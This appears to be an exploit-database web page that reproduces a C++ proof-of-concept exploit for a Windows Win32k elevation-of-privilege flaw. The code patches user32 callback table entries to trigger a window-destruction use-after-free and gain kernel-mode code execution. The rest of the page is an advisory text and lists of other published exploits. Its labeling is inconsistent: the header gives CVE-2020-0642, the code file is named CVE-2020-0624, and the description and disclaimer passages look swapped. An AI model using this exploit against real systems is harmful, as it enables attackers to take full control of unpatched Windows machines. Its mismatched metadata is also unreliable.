Menu

Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Microsoft Windows - Win32k Elevation of Privilege"

Author

Exploit author

nu11secur1ty

Platform

Exploit platform

windows

Release date

Exploit published date

2020-12-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege
# Author: nu11secur1ty
# Date: 08.03.2020
# Exploit Date: 01/14/2020
# Vendor: Microsoft
# Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
# CVE: CVE-2020-0642

[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source:  readme from GitHUB

[Exploit Program Code]

// cve-2020-0624.cpp

#pragma warning(disable: 4005)
#pragma warning(disable: 4054)
#pragma warning(disable: 4152)
#pragma warning(disable: 4201)

#include <Windows.h>
#include "ntos.h"

typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);

HWND hParent{}, hChild{};
BOOL Flag1{}, Flag2{};

PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};

NTSTATUS NTAPI NewCCI2(PVOID Param)
{
	if (Flag1)
	{
		Flag1 = FALSE;
		Flag2 = TRUE;
		DestroyWindow(hParent);
	}
	return OrgCCI2(Param);
}
NTSTATUS NTAPI NewCCI3(PVOID Param)
{
	if (Flag2)
	{
		ExitThread(0);
	}
	return OrgCCI3(Param);
}
int main()
{
	DWORD OldProtect{};

	PTEB teb = NtCurrentTeb();
	PPEB peb = teb->ProcessEnvironmentBlock;
	PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
	if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
		return 0;
	OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
&NewCCI2);

	PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
	if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
		return 0;
	OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
&NewCCI3);

	hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
	hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
NULL);
	Flag1 = TRUE;
	SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
	return 0;
}


[Vendor]
Microsoft


[Vulnerability Type]
Privilege Escalation


[Description]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642

[Disclosure Timeline]
An elevation of privilege vulnerability exists in Windows when the
Win32k component fails to properly handle objects in memory. An
attacker who successfully exploited this vulnerability could run
arbitrary code in kernel mode. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.
To exploit this vulnerability, an attacker would first have to log on
to the system. An attacker could then run a specially crafted
application that could exploit the vulnerability and take control of
an affected system.
The update addresses this vulnerability by correcting how Win32k
handles objects in memory.


[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-04-14 "Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution" webapps java nu11secur1ty
2020-02-17 "MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation" local windows nu11secur1ty 
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49179/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected